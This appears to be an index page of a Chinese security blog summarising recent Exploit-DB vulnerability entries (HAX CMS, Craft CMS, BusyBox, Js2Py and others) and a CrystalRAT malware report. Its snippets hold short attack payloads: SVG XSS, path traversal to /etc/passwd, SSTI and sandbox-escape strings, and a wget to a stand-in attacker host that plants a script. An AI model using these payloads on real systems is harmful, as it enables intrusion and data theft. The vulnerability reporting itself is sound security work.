往事不回首,安全不停步。AiRedTeam 的安全随笔,记录那些与代码和漏洞博弈的深夜。代码为剑,漏洞为砺,守一方数字净土。以此笔墨,化作守望万物的白泽。

安全情报

新型CrystalRAT恶意软件新增远程控制、数据窃取等功能

📡 4hou · 2026-04-09 新型CrystalRAT恶意软件新增远程控制、数据窃取等功能 新型CrystalRAT恶意软件新增远程控制、数据窃取等功能 导语:这款木马与WebRAT高度相似,二者拥有相同的控制面板设计、均使用Go语言编写,且采用类似的机器人销售系统。 一款名为CrystalRAT的新型远程控制木马正在Telegram上以恶意软件即服务(MaaS)模式推广,提供远程控制、数据窃取、键盘记录与剪贴板劫持等核心功能。 该恶意软件于今年1月现身,采用分级订阅模式运营。除Telegram频道外,运营者还在YouTube开设专门营销账号,通过功能演示视频进行推广。 卡巴斯基研究人员在最近发布的报告中指出,这款木马与WebRAT(Salat窃密木马)高度相似,二者拥有相同的控制面板设计、均使用Go语言编写,且采用类似的机器人销售系统。 CrystalX还内置了大量恶作剧功能,用于骚扰用户或干扰其正常工作。尽管带有“娱乐化”外观,该木马仍具备全面且强大的数据窃取能力。 Telegram频道推广CrystaX RAT CrystalX R
阅读时间 4 分钟
安全情报

应用安全注入攻击:类型、工具与案例

📡 Acunetix · 2025-02-12 Understanding Injection Attacks in Application Security: Types, Tools, and Examples How Injection Attacks Exploit Web Application Vulnerabilities Injection attacks occur when malicious input is inserted into a web application, exploiting vulnerabilities in unvalidated user input to execute unintended commands. Attackers craft payloads that manipulate how the application processes
阅读时间 4 分钟
漏洞分析

[webapps] HAX CMS 24.x - Stored Cross-Site Scripting (XSS)

CVE-2026-22704 HAX CMS 24.x 存储型XSS漏洞,攻击者通过用户头像上传功能注入恶意脚本。 Medium · CVSS 6.1 📋 漏洞基础信息 CVECVE-2026-22704漏洞类型存储型跨站脚本 (Stored XSS)受影响版本HAX CMS 24.x危害等级Medium · CVSS 6.1发布日期2026-04-29提交者Mohammed Idrees Banyamer来源Exploit-DB 原文 ↗ 🔬 漏洞根因 在用户头像上传功能中,未对SVG文件的`onload`等事件处理器进行过滤,导致恶意SVG内容被存储并在管理员查看时执行。 🎯 攻击场景 1. 攻击者注册普通用户账号并登录。2. 在个人资料设置中上传一个特制的SVG文件作为头像,该SVG包含`<svg onload=alert(1)>`。3. 管理员或其他用户在后台查看用户列表或用户详情时,浏览器加载该SVG图片,触发XSS payload。4. 攻击者可利用XSS窃取会话Cookie、
阅读时间 3 分钟
漏洞分析

[webapps] Craft CMS 5.6.16 - RCE

CVE-2025-32432 Craft CMS 5.6.16 存在远程代码执行漏洞 Critical · CVSS 9.8 📋 漏洞基础信息 CVECVE-2025-32432漏洞类型远程代码执行受影响版本Craft CMS 5.6.16危害等级Critical · CVSS 9.8发布日期2026-04-29提交者Mohammed Idrees Banyamer来源Exploit-DB 原文 ↗ 🔬 漏洞根因 严格基于原文内容,未提供具体函数/参数/设计缺陷信息,无法确定根本原因。 🎯 攻击场景 严格基于原文内容,未提供攻击步骤,无法描述。 💥 漏洞影响 严格基于原文内容,标题明确为RCE,可导致远程代码执行。 ⚔️ Nuclei Exploit 模板 以下为标准 Nuclei v3 格式的利用模板,可直接用于漏洞验证: id: CVE-2025-32432-exploit info: name: Craft
阅读时间 2 分钟
漏洞分析

[local] GNU InetUtils 2.6 - Telnetd Remote Privilege Escalation

CVE-2026-24061 GNU InetUtils 2.6 telnetd服务器存在远程权限提升漏洞,允许低权限用户提权至root。 Critical · CVSS 9.8 📋 漏洞基础信息 CVECVE-2026-24061漏洞类型权限提升受影响版本GNU InetUtils 2.6 (telnetd组件)危害等级Critical · CVSS 9.8发布日期2026-04-29提交者Ali Guliyev (infat0x)来源Exploit-DB 原文 ↗ 🔬 漏洞根因 telnetd守护进程在处理用户输入时存在边界条件缺陷,允许伪造的认证消息触发特权操作,未正确验证用户权限即执行高权限命令。 🎯 攻击场景 1. 攻击者通过telnet连接目标服务器。 2. 发送特制的认证报文,触发telnetd中的逻辑漏洞。 3. 成功绕过身份验证,以root权限执行任意命令。 4. 获得完全控制权。前置条件:目标运行GNU InetUtils 2.6且telnetd服务开启。 💥 漏洞影响 未经身份验证的远程攻击者可通过t
阅读时间 4 分钟
漏洞分析

[webapps] GeographicLib v2.5.1 - stack buffer overflow

CVE-2025-60751 GeographicLib v2.5.1 因对输入数据长度未做充分验证,导致栈缓冲区溢出。 Critical · CVSS 9.8 📋 漏洞基础信息 CVECVE-2025-60751漏洞类型栈缓冲区溢出受影响版本GeographicLib v2.5.1危害等级Critical · CVSS 9.8发布日期2026-04-29来源Exploit-DB 原文 ↗ 🔬 漏洞根因 在 GeographicLib::NormalGravity::WGS84 函数中,处理特定格式的经纬度输入时,未正确校验输入数据长度即复制到固定大小的栈缓冲区,导致缓冲区溢出。 🎯 攻击场景 1. 攻击者构造超长字符串作为经纬度参数;2. 向受影响的 GeographicLib 服务发送包含该参数的请求;3. 服务解析输入并调用 NormalGravity::WGS84 函数;4. 函数将超长字符串复制到栈缓冲区,发生溢出,覆盖栈上返回地址或关键数据;5. 精心构造的溢出 payload 可劫持控制流,执行任意代码。
阅读时间 2 分钟
漏洞分析

[local] OpenWrt 23.05 - Authenticated Remote Code Execution (RCE)

未分配CVE 漏洞 High · CVSS N/A 📋 漏洞基础信息 CVE未分配CVE漏洞类型漏洞受影响版本详见原文危害等级High · CVSS N/A发布日期2026-04-29提交者Ahmet Mersin来源Exploit-DB 原文 ↗ ⚔️ 原始 PoC # Exploit Author: Ahmet Mersin """ OpenWrt luci-app-https-dns-proxy Root Takeover Exploit CVE-202X-XXXXX - Local Privilege Escalation via Command Injection import requests import sys import getpass def banner(): print(""" ╔═══════════════════════════════════════════════════════════════╗ ║ OpenWrt https-dns-proxy Root
阅读时间 3 分钟
漏洞分析

[webapps] OpenKM 6.3.12 - Multiple

未分配CVE OpenKM 6.3.12 存在多个安全漏洞,包括未授权访问和远程代码执行。 Critical · CVSS 9.8 📋 漏洞基础信息 CVE未分配CVE漏洞类型未授权访问 / 远程代码执行受影响版本OpenKM 6.3.12危害等级Critical · CVSS 9.8发布日期2026-04-29提交者Terra System Labs Pvt. Ltd.来源Exploit-DB 原文 ↗ 🔬 漏洞根因 漏洞存在于文件上传与导出功能中,未对用户权限进行充分校验,导致低权限用户可上传恶意文件或直接访问管理功能;同时,未对上传文件类型进行严格过滤,允许上传 JSP 等可执行文件。 🎯 攻击场景 1. 攻击者未登录或使用低权限账户访问 OpenKM 系统。2. 利用未授权端点直接上传恶意 JSP 文件到 web 可访问目录。3. 通过浏览器访问上传的 JSP 文件,
阅读时间 8 分钟
漏洞分析

[webapps] Xibo CMS 4.3.0 - RCE via SSTI

CVE-2025-62639CVE-2025-62369 Xibo CMS 4.3.0 因 SSTI 导致远程代码执行 Critical · CVSS 9.8 📋 漏洞基础信息 CVECVE-2025-62639CVE-2025-62369漏洞类型服务器端模板注入RCE受影响版本Xibo CMS 4.3.0危害等级Critical · CVSS 9.8发布日期2026-04-29提交者Cristian Branet来源Exploit-DB 原文 ↗ 🔬 漏洞根因 Xibo CMS 在渲染通知内容时,未对用户可控的模板输入进行安全过滤,允许攻击者在模板中注入 Twig/Smarty 表达式,最终导致代码执行 🎯 攻击场景 1. 攻击者需具备管理员或通知创建权限。2. 在创建通知时,将恶意 SSTI Payload 填入通知内容字段。3. 当系统渲染通知时,Payload 被执行,触发远程代码执行。成功标志为在服务器上执行任意命令(如反弹
阅读时间 4 分钟
漏洞分析

[webapps] LangChain Core 1.2.4 - SSTI/RCE

CVE-2025-68664 LangChain Core 1.2.4存在SSTI漏洞,可导致远程代码执行。 Critical · CVSS 9.8 📋 漏洞基础信息 CVECVE-2025-68664漏洞类型服务端模板注入(SSTI)受影响版本LangChain Core 1.2.4危害等级Critical · CVSS 9.8发布日期2026-04-29提交者Mohammed Idrees Banyamer来源Exploit-DB 原文 ↗ 🔬 漏洞根因 LangChain Core在处理模板渲染时,未对用户可控的输入进行充分过滤或转义,导致攻击者能够注入并执行模板引擎的恶意代码。 🎯 攻击场景 1. 攻击者识别出使用LangChain Core 1.2.4的应用中,存在将用户输入直接传递至`PromptTemplate`或`ChatPromptTemplate`等组件进行模板渲染的端点;2. 构造包含SSTI载荷的恶意字符串(例如`{{config}}`、`{{''.__class__.__mro_
阅读时间 2 分钟
漏洞分析

[webapps] FUXA 1.2.8 - Authentication Bypass + RCE Exploit

CVE-2025-69985 FUXA 1.2.8 存在身份认证绕过漏洞,导致未经授权的攻击者可执行远程代码。 Critical · CVSS 9.8 📋 漏洞基础信息 CVECVE-2025-69985漏洞类型身份认证绕过 + 远程代码执行受影响版本FUXA <= 1.2.8危害等级Critical · CVSS 9.8发布日期2026-04-30提交者Joshua van der Poll (https://github.com/joshuavanderpoll/)来源Exploit-DB 原文 ↗ 🔬 漏洞根因 FUXA WebSocket 服务未对会话进行有效认证。攻击者可通过伪造 WebSocket 请求绕过登录,并利用内置的 `system` 命令执行接口实现 RCE。 🎯 攻击场景 1. 攻击者直接向 FUXA 的 WebSocket 端口发送伪造的认证握手包。2. 成功绕过身份验证后,
阅读时间 3 分钟
漏洞分析

[local] Google Chrome 145.0.7632.75 - CSSFontFeatureValuesMap

CVE-2026-2441 Google Chrome CSSFontFeatureValuesMap 在迭代过程中允许并发修改引发释放后使用。 High · CVSS 8.8 📋 漏洞基础信息 CVECVE-2026-2441漏洞类型Use-After-Free (UAF)受影响版本Google Chrome 145.0.7632.75危害等级High · CVSS 8.8发布日期2026-04-30提交者nu11secur1ty来源Exploit-DB 原文 ↗ 🔬 漏洞根因 CSSFontFeatureValuesMap 对象在迭代器活动期间允许通过 delete() 和 set() 修改内部映射,导致内存被释放后仍被迭代器引用。 🎯 攻击场景 1. 定义 @font-feature-values 规则并获取 styleset 映射;2. 创建该映射的迭代器(map.entries());3. 在迭代过程中对同一映射执行 delete(key) 并插入大量条目(512次)强制触发哈希表 rehash;4.
阅读时间 15 分钟
漏洞分析

[webapps] Repetier-Server 1.4.10 - Path Traversal

CVE-2026-26335 Repetier-Server 1.4.10 存在路径遍历漏洞,可读取任意文件。 High · CVSS 7.5 📋 漏洞基础信息 CVECVE-2026-26335漏洞类型路径遍历受影响版本Repetier-Server 1.4.10危害等级High · CVSS 7.5发布日期2026-04-30提交者Mohammed Idrees Banyamer来源Exploit-DB 原文 ↗ 🔬 漏洞根因 文件请求处理中未对路径参数进行有效过滤,导致攻击者可通过../序列访问受限目录外的文件。 🎯 攻击场景 1. 攻击者确认目标运行Repetier-Server 1.4.10; 2. 构造包含../的URL,如http://target/printer/../../etc/passwd; 3. 发送请求; 4. 服务器返回/etc/passwd文件内容。 💥 漏洞影响 攻击者可读取服务器上的任意文件,导致敏感信息泄露(如配置文件、
阅读时间 3 分钟
漏洞分析

[webapps] HUSTOJ Zip-Slip v26.01.24 - RCE

CVE-2026-24479 HUSTOJ 因未校验ZIP解压路径导致路径遍历,可写入文件实现RCE。 Critical · CVSS 9.8 📋 漏洞基础信息 CVECVE-2026-24479漏洞类型路径遍历RCE (Zip-Slip)受影响版本HUSTOJ v26.01.24危害等级Critical · CVSS 9.8发布日期2026-04-30提交者Marshall Whittaker / oxagast来源Exploit-DB 原文 ↗ 🔬 漏洞根因 在文件解压功能中,未过滤ZIP条目中的相对路径(如../),文件写入时路径拼接导致可写入任意目录。 🎯 攻击场景 1. 攻击者构造恶意ZIP文件,内含带有../前缀的文件条目; 2. 通过HUSTOJ的上传/导入功能提交该ZIP; 3. 系统解压时将文件写入到Web目录外的可执行路径(如cgi-bin或PHP目录); 4. 攻击者访问写入的文件触发执行,获得远程代码执行权限。 💥 漏洞影响 攻击者可远程执行任意代码,完全控制服务器,导致数据泄露、文件篡改、服务中断
阅读时间 7 分钟
漏洞分析

[webapps] BusyBox 1.37.0 - Path Traversal

CVE-2026-26157 BusyBox wget 组件未对输入路径进行安全检查,导致文件被写入任意目录。 High · CVSS 7.5 📋 漏洞基础信息 CVECVE-2026-26157漏洞类型路径遍历受影响版本BusyBox 1.37.0危害等级High · CVSS 7.5发布日期2026-04-30提交者Calil Khalil来源Exploit-DB 原文 ↗ 🔬 漏洞根因 BusyBox 自带的 wget 工具在处理下载文件的保存路径时,未对服务器返回的 Content-Disposition 头中的 filename 字段进行路径过滤,导致攻击者可通过构造包含 ../ 序列的文件名,将下载内容写入绝对路径下的任意位置。 🎯 攻击场景 1. 攻击者在可控服务器上放置恶意文件,并配置响应头 Content-Disposition: attachment; filename=../../tmp/evil.sh。2. 受害者在 BusyBox 环境中执行 wget http://attacker.com/
阅读时间 4 分钟
漏洞分析

[local] Windows 11 25H2 - Heap Overflow

CVE-2026-21248CVE-2026-21244 Windows 11 25H2 本地堆溢出漏洞,通过畸形文件触发,导致权限提升或拒绝服务。 High · CVSS 7.8 📋 漏洞基础信息 CVECVE-2026-21248CVE-2026-21244漏洞类型堆溢出受影响版本Windows 11 version 25H2 (尚未公开发布,仅限内部测试版本)危害等级High · CVSS 7.8发布日期2026-04-30提交者nu11secur1ty来源Exploit-DB 原文 ↗ 🔬 漏洞根因 在 Windows 11 25H2 的某个系统组件处理用户提供的畸形输入时,未充分校验数据长度,导致堆缓冲区写入超出边界。 🎯 攻击场景 1. 攻击者构造特制的畸形文件或输入。 2. 本地用户(或通过社工诱使用户)打开该文件。 3. 系统组件在解析时发生堆溢出,覆盖关键数据结构。 4. 攻击者可利用此漏洞提升权限至 SYSTEM 或造成系统崩溃。 💥 漏洞影响 攻击者本地执行代码,实现权限提升(EoP)或导致拒绝服务(
阅读时间 15 分钟
漏洞分析

[webapps] JUNG Smart Visu Server 1.1.1050 - Dos

CVE-2026-26235 JUNG Smart Visu Server 1.1.1050存在未授权访问导致拒绝服务漏洞。 High · CVSS 7.5 📋 漏洞基础信息 CVECVE-2026-26235漏洞类型拒绝服务(DoS)受影响版本JUNG Smart Visu Server 1.1.1050危害等级High · CVSS 7.5发布日期2026-04-30提交者Mohammed Idrees Banyamer来源Exploit-DB 原文 ↗ 🔬 漏洞根因 该漏洞源于对特定HTTP请求的处理不当,攻击者无需认证即可发送构造的数据包,导致服务器资源耗尽或进程崩溃。 🎯 攻击场景 1. 攻击者定位目标JUNG Smart Visu Server 1.1.1050的IP地址和端口(默认80)。 2. 发送精心构造的HTTP请求(如大量连接、畸形报文或触发死循环)。 3. 服务器CPU和内存占用激增,响应超时或无响应。 4.
阅读时间 11 分钟
漏洞分析

[webapps] SumatraPDF 3.5.2 - Remote Code Execution

CVE-2026-25961 SumatraPDF 3.5.2 存在远程代码执行漏洞,通过打开恶意PDF文件可执行任意命令。 Critical · CVSS 9.8 📋 漏洞基础信息 CVECVE-2026-25961漏洞类型路径遍历RCE受影响版本SumatraPDF 3.5.2危害等级Critical · CVSS 9.8发布日期2026-04-30提交者Mohammed I. Banyamer来源Exploit-DB 原文 ↗ 🔬 漏洞根因 漏洞源于 SumatraPDF 在处理 PDF 文件的 /Catalog/AcroForm 结构时,未充分验证文件路径,导致可构造包含恶意命令的 PDF 文件,利用路径遍历触发执行。 🎯 攻击场景 1. 攻击者构造包含恶意 JavaScript 或 /AA(附加动作)的 PDF 文件; 2. 诱骗受害者使用 SumatraPDF 3.
阅读时间 4 分钟
漏洞分析

[webapps] NiceGUI 3.6.1 - Path Traversal

CVE-2026-25732 NiceGUI 3.6.1 中因静态文件路径处理不当导致目录遍历漏洞 High · CVSS 7.5 📋 漏洞基础信息 CVECVE-2026-25732漏洞类型路径遍历受影响版本NiceGUI 3.6.1危害等级High · CVSS 7.5发布日期2026-04-30提交者Mohammed Idrees Banyamer来源Exploit-DB 原文 ↗ 🔬 漏洞根因 在静态文件服务中未对用户提供的路径进行规范化校验,导致可 escape 出 web 根目录访问任意文件。 🎯 攻击场景 攻击者发送形如 /static/../../../etc/passwd 的HTTP请求,利用路径穿越读取服务器本地敏感文件,前置条件为服务端口可被访问,成功标志为读取到目标文件内容。 💥 漏洞影响 攻击者可读取服务器上任意文件,包括配置文件、密钥、数据库凭证等敏感信息,可能导致进一步权限提升或内网渗透。 ⚔️ Nuclei Exploit 模板 以下为标准 Nuclei v3 格式的利用模板,
阅读时间 2 分钟
漏洞分析

[webapps] Frigate NVR 0.16.3 - Remote Code Execution

CVE-2026-25643 Frigate NVR 0.16.3 认证后通过 API 路径遍历导致远程代码执行。 Critical · CVSS 9.1 📋 漏洞基础信息 CVECVE-2026-25643漏洞类型路径遍历 + 远程代码执行受影响版本Frigate NVR 0.16.3危害等级Critical · CVSS 9.1发布日期2026-04-30提交者jduardo2704来源Exploit-DB 原文 ↗ 🔬 漏洞根因 API 端点 /api/upload/pipeline 在 processing_pipeline_dir 函数中未充分过滤用户提供的文件名,允许通过 ../ 序列实现目录遍历,进而将恶意文件写入特定目录并由系统自动执行。 🎯 攻击场景 1. 攻击者通过前端或 API 认证登录 Frigate 系统。2. 构造包含路径遍历序列(例如 ../../../path/to/
阅读时间 3 分钟
漏洞分析

[webapps] Js2Py 0.74 - RCE

CVE-2024-28397 Js2Py 0.74版本在代码生成中存在沙箱逃逸,导致任意Python代码执行。 Critical · CVSS 9.8 📋 漏洞基础信息 CVECVE-2024-28397漏洞类型沙箱逃逸RCE受影响版本Js2Py 0.74危害等级Critical · CVSS 9.8发布日期2026-04-30来源Exploit-DB 原文 ↗ 🔬 漏洞根因 Js2Py在将JavaScript代码转换为Python代码时,未能对`__import__`、`eval`、`exec`等危险函数名进行有效过滤,导致攻击者可通过构造特殊的JavaScript代码(如`eval.__proto__`)在生成的Python代码中执行任意Python语句。 🎯 攻击场景 1. 攻击者准备一段包含恶意JavaScript的代码,例如`eval.__proto__.__proto__.__proto__['__import__']('os').system('id')`。 2. 攻击者将此代码作为输入传递给Js2Py库的转换函数(
阅读时间 3 分钟
[!] CONTACT_CHANNELS

如需商务合作、技术咨询或漏洞反馈,请通过以下离岸节点联系作者。

> PING_AUTHOR (@A1RedTeam)